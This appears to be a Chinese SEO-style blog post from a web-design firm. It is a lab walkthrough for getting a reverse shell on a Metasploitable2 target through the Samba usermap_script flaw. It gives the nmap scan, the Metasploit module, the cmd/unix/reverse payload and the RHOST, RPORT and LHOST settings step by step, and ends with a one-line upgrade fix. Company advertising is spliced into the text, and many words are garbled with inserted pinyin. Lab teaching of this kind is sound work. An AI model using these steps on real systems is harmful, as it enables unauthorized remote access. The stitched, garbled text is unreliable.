十年網(wǎng)站開發(fā)經(jīng)驗(yàn) + 多家企業(yè)客戶 + 靠譜的建站團(tuán)隊
量身定制 + 運(yùn)營維護(hù)+專業(yè)推廣+無憂售后,網(wǎng)站問題一站解決
這篇文章主要介紹“如何利用samba服務(wù)漏洞獲取主機(jī)shell”,在日常操作中,相信很多人在如何利用samba服務(wù)漏洞獲取主機(jī)shell問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”如何利用samba服務(wù)漏洞獲取主機(jī)shell”的疑惑有所幫助!接下來,請跟著小編一起來學(xué)習(xí)吧!
阿爾山網(wǎng)站制作公司哪家好,找創(chuàng)新互聯(lián)!從網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、響應(yīng)式網(wǎng)站等網(wǎng)站項(xiàng)目制作,到程序開發(fā),運(yùn)營維護(hù)。創(chuàng)新互聯(lián)從2013年開始到現(xiàn)在10年的時間,我們擁有了豐富的建站經(jīng)驗(yàn)和運(yùn)維經(jīng)驗(yàn),來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。
本次靶機(jī)的運(yùn)行系統(tǒng)是metasploitable2, 它是一個特制的ubuntu操作系統(tǒng),主要用于安全工具測試和演示常見的漏洞攻擊。
利用nmap掃描并查看系統(tǒng)開放端口和相應(yīng)的的應(yīng)用程序,命令為nmap -sV 靶機(jī)地址,其中s是scan,V是version。

查看445端口和139端口中運(yùn)行著samba3.X-4.X的服務(wù),samba是一款基于SMB(server message block)協(xié)議的免費(fèi)軟件,SMB用于在局域網(wǎng)內(nèi)共享打印機(jī)和文件。
打開Metasploit工具,在msf下輸入search samba,查找可利用的漏洞模塊。

選擇exploit/multi/samba/usermap_script,因?yàn)樗粯?biāo)記為excellent,輸入use exploit/multi/samba/usermap_script,利用該模塊,使用show payloads命令查看該模塊下的payload。

因?yàn)槟繕?biāo)機(jī)是linux機(jī),所以選擇linux的載荷,這里選擇基礎(chǔ)的cmd/unix/reverse反向攻擊載荷模塊,選擇命令set payload cmd/unix/reverse。

設(shè)置靶機(jī)地址:set RHOST 靶機(jī)地址
設(shè)置漏洞端口:set RPORT 445
設(shè)置攻擊機(jī)地址:set LHOST 攻擊機(jī)地址
使用 show options命令查看配置是否正確。
輸入exploit或run命令進(jìn)行攻擊,成功獲取目標(biāo)的主機(jī)的shell。

以上以linux系統(tǒng)滲透為例,windows系統(tǒng)的滲透過程其實(shí)也差不多,只不過可能利用的漏洞模塊和載荷的組合方式可能不一樣。防御方法:將samba服務(wù)升級到最新版本,即可防御該漏洞。
到此,關(guān)于“如何利用samba服務(wù)漏洞獲取主機(jī)shell”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識,請繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會繼續(xù)努力為大家?guī)砀鄬?shí)用的文章!